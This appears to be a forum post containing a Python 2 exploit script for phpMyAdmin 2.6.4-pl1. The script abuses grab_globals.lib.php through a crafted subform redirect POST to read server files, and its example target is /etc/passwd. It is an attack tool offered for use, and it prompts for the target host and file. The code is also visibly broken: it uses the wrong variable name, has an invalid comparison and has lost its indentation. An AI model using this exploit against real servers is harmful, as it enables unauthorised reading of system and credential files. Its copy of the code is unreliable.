import httplib
# phpMyAdmin "grab_globals.lib.php" Remote Directory Traversal Exploit
# modified by Crn1vuk5 and translated to Python
#this file could be used as import script
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "modified by Crn1vuk5 and translated to Python"
print " \r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
def phpMyAdminexploit(Host,Dir,File):
h=httplib.HTTPConnection(Host)
dirx=str(Dir)+"libraries/grab_globals.lib.php"
filex="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]="+str(file)+"&subform[1][cXIb8O3]=1"
length=len(filex)
h.putrequest('POST',dirx,'HTTP/1.0')
print "Sending Exploit to target",Host,dirx,filex
h.putheader('Host',Host)
h.putheader('Accept','text/plain;q=0.8,image/png,*/*;q=0.5')
h.putheader('Accept-Language',' en-us,en;q=0.5')
h.putheader('Content-Type', 'application/x-www-form-urlencoded')
h.putheader('Content-Length',length)
h.endheaders()
h.send(filex)
r1 = h.getresponse()
if r1.status="200 OK":
print "exploit sent"
else:
print "expolit failed"
host_=raw_input("Enter the name of the Host : ")
dir_=raw_input("Enter the name of the Directory:")
file_=raw_input("File to inclusion:")
phpMyAdminexploit(host_,dir_,file_)
[Ovu poruku je menjao BigBrother2005 dana 19.10.2005. u 14:50 GMT+1]
print "Hello"
[/code]
---------------------------------------
Ljudi traze znanje, a ja trazim burek